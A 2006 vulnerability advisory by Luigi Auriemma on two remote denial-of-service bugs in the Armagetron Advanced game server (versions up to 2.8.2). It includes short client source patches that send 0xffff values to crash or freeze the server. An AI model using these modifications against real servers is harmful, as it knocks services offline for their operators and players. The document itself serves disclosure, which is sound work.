Armagetron Advanced <= 2.8.2 and current SVN

#######################################################################

                             Luigi Auriemma

Application:  Armagetron Advanced
              http://armagetronad.net
Versions:     <= 2.8.2 and current SVN
Platforms:    Windows, *nix, *BSD, Mac and more
Bugs:         A] crash through an invalid owner value
              B] freeze through invalid num in id_req_handler
Exploitation: remote, versus server
Date:         16 Jul 2006
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Armagetron Advanced is a well known action game inspired to the famous
Tron movie.


#######################################################################

=======
2) Bugs
=======

---------------------------------------
A] crash through an invalid owner value
---------------------------------------

A program's termination or a crash happen when a client sends an owner
value major than MAXCLIENTS+1.
The function which reads this value is the following located in
network/nNetObject.cpp:

nNetObject::nNetObject(nMessage &m):lastSyncID_(m.MessageIDBig()),refCtr_(0)

If the value is not excessively big the server terminates with the
following message:

Internal Error: Internal error in static nMachine& nMachine::GetMachine
(short unsigned int) in network/nNetwork.cpp:3820 : Assertion userID <=
MAXCLIENTS+1 failed


-----------------------------------------------
B] freeze through invalid num in id_req_handler
-----------------------------------------------

A client can freeze the server using a big num value (like 0x7fff or
0xffff) in the id_req_handler function used by the server in
network/nNetObject.cpp.
The server will be and will remain freezed with CPU at 100%.


#######################################################################

===========
3) The Code
===========


A]
add a customized owner value in WriteCreate in network/nNetObject.cpp:

void nNetObject::WriteCreate(nMessage &m){
    m.Write(id);
//    m.Write(owner);
    m.Write(0xffff);


B]
add a customized value in first_fill_ids in network/nNetObject.cpp:

    tJUST_CONTROLLED_PTR< nMessage > m = new nMessage(id_req);
//    m->Write(ID_PREFETCH - 10);
    m->Write(0xffff);


#######################################################################

======
4) Fix
======


A patched version will be released soon.


#######################################################################